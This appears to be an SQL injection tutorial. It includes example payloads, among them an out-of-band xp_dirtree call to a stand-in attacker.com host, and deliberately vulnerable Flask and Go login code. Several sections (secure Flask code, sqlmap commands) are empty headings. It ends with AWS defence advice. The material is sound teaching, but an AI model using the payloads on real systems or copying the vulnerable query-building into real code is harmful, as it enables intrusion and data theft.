-
β Explanation of SQL Injection and its types
-
π Flask and 𦫠Go vulnerable code examples
-
βοΈ Usage of
sqlmapfor testing -
βοΈ How to prevent SQL Injection using AWS Security Services
π‘οΈ SQL Injection (SQLi) Tutorial¶
With Flask & Go Examples, sqlmap Testing, and AWS Security Setup
π What is SQL Injection?¶
SQL Injection (SQLi) is a type of web attack where an attacker injects malicious SQL queries into an input field to manipulate or access sensitive database information.
π Types of SQL Injection (with Examples)¶
| Type | Description | Example Payload |
|---|---|---|
| 1οΈβ£ In-Band | Result is returned in response | ' OR '1'='1 -- |
| 2οΈβ£ Blind | No direct result, use logic (true/false) | ' AND 1=1 -- vs ' AND 1=2 -- |
| 3οΈβ£ Out-of-Band | Uses external channels (e.g., DNS, HTTP) | '; exec xp_dirtree '\\attacker.com\abc' |
π§ͺ Vulnerable Login Examples¶
π Flask Example¶
from flask import Flask, request
import sqlite3
app = Flask(__name__)
@app.route('/login', methods=['POST'])
def login():
username = request.form['username']
password = request.form['password']
# β Vulnerable query
conn = sqlite3.connect('test.db')
cursor = conn.cursor()
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
cursor.execute(query)
result = cursor.fetchone()
return "Login Successful" if result else "Login Failed"
app.run(debug=True)
𦫠Go Example¶
package main
import (
"database/sql"
"fmt"
"log"
"net/http"
_ "github.com/mattn/go-sqlite3"
)
func loginHandler(w http.ResponseWriter, r *http.Request) {
username := r.FormValue("username")
password := r.FormValue("password")
// β Vulnerable query
db, _ := sql.Open("sqlite3", "./test.db")
query := fmt.Sprintf("SELECT * FROM users WHERE username = '%s' AND password = '%s'", username, password)
row := db.QueryRow(query)
var user, pass string
err := row.Scan(&user, &pass)
if err == nil {
fmt.Fprintln(w, "Login Successful")
} else {
fmt.Fprintln(w, "Login Failed")
}
}
func main() {
http.HandleFunc("/login", loginHandler)
log.Fatal(http.ListenAndServe(":8080", nil))
}
β Secure Versions¶
βοΈ Flask (Safe)¶
βοΈ Go (Safe)¶
stmt, _ := db.Prepare("SELECT * FROM users WHERE username = ? AND password = ?")
row := stmt.QueryRow(username, password)
π§ͺ SQLMap for Automated Testing¶
π§ Install¶
π Test vulnerable Flask server¶
π― Example Commands¶
-
Dump DB:
-
Show DB names:
You can test the Go app the same way on port 8080.
π‘οΈ Preventing SQL Injection with AWS Security Services¶
Now that your app is secure at the code level, letβs protect it at the infrastructure and cloud layer.
βοΈ AWS Services to Prevent SQLi & Web Attacks¶
| AWS Service | Role |
|---|---|
| π₯ AWS WAF | Blocks SQLi, XSS, CSRF, and common threats |
| π΅οΈ Amazon GuardDuty | Detects threats and anomalies (e.g., SSRF attempts) |
| π AWS Secrets Manager | Secures DB credentials (no hardcoded passwords) |
| π AWS CloudWatch | Monitors logs, detects brute force attempts |
| π AWS CloudTrail | Logs AWS API calls for auditing and detection |
| π‘οΈ AWS Shield | DDoS protection (included with AWS WAF) |
| π§ AWS Cognito | Secure user auth, validation, and MFA |
π Use AWS WAF for Web Protection¶
Attach WAF to:
-
ALB
-
API Gateway
-
CloudFront
Enable Managed Rulesets:
-
AWSManagedRulesSQLiRuleSet -
AWSManagedRulesCommonRuleSet -
AWSManagedRulesKnownBadInputsRuleSet
π Use Secrets Manager¶
-
Store DB credentials securely
-
Rotate secrets
-
Access via SDK, not hardcoded
π Monitor with GuardDuty + CloudWatch¶
-
GuardDuty β anomaly detection (recon, credential abuse)
-
CloudWatch β failed logins, slow queries, spikes in usage
π§° Example Architecture:¶
User
β
CloudFront (AWS WAF attached)
β
Application Load Balancer
β
Flask / Go App (Safe SQL Queries)
β
Amazon RDS (Credentials via Secrets Manager)
β Summary¶
| Layer | What to Do |
|---|---|
| App Code | Use prepared statements / ORM |
| Web Protection | Use AWS WAF + Shield |
| Secrets | Use AWS Secrets Manager |
| Monitoring | GuardDuty, CloudWatch, CloudTrail |
| Authentication | Secure with AWS Cognito |